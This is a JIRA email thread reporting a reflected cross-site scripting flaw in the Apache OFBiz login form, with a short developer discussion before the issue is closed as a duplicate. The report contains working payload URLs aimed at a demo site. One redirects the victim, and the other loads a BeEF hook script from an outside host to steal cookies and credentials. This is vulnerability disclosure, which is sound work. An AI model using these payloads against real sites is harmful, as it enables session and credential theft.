[jira] Created: (OFBIZ-1476) XSS vulnerability in OFBiz Login Form

XSS vulnerability in OFBiz Login Form
-------------------------------------

                 Key: OFBIZ-1476
                 URL: https://issues.apache.org/jira/browse/OFBIZ-1476
             Project: OFBiz
          Issue Type: Bug
          Components: product
            Reporter: Emmanuel Saracco


Hi,

There is a Cross Site Scripting vulnerability in OFBiz login form that allow a attacker to stole user's data.

PoC:

* Redirection to another site:

https://demo.hotwaxmedia.com/ecommerce/control/login?USERNAME=a%22%3E%3Cscript%3Edocument.location.href%3D%27http%3A%2F%2Fwww.bindshell.net%27%3B%3C%2Fscript%3E%3Ca+name%3D%22a

* BeEF injection:

https://demo.hotwaxmedia.com/catalog/control/login?USERNAME=a%22%3E%3Cscript%20language=%22javascript%22%20src=%22http://192.168.4.2/beef/hook/beefmagic.js.php%22%3E%3C/script%3E%3Ca%20name=%22a

Same thing using "PASSWORD" instead of  "USERNAME".

Bye


--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.

    [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547550 ]

BJ Freeman commented on OFBIZ-1476:
-----------------------------------

I am not sure this is accurate.
If you only put in username or password the login fails.


The Following Errors Occurred:

The Password was empty, please re-enter.

there is a statement in the status window about tranfering data, but this is standard if you observe other pages when they are loading.
It is not transferring data to another site. unless you have some data you have capture this way.
in which case it would be nice to have a sample.




--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.

    [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547553 ]

Emmanuel Saracco commented on OFBIZ-1476:
-----------------------------------------

Hi,

Like for all XSS occuring in login forms, with the help of BeEF (or similar tools) the attacker will be able to stole cookies, capture login/password re-entered by the user, etc.

It is as accurate as many other XSS vulnerabilities found on login form. No more, no less.

But it is so easy to patch that it can not hurt OFBiz code quality :-)

Bye

--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.

    [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547581 ]

BJ Freeman commented on OFBIZ-1476:
-----------------------------------

you seem knowledgeable,
what not submit a patch.

--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.

     [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ]

Jacques Le Roux closed OFBIZ-1476.
----------------------------------

    Resolution: Duplicate
      Assignee: Jacques Le Roux

OFBIZ-178

--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.

    [ https://issues.apache.org/jira/browse/OFBIZ-1476?page=com.atlassian.jira.plugin.system.issuetabpanels:comment-tabpanel#action_12547603 ]

jacques.le.roux edited comment on OFBIZ-1476 at 12/2/07 2:05 AM:
-----------------------------------------------------------------

Duplicate of OFBIZ-178

      was (Author: jacques.le.roux):
    OFBIZ-178
 
--
This message is automatically generated by JIRA.
-
You can reply to this email to add a comment to the issue online.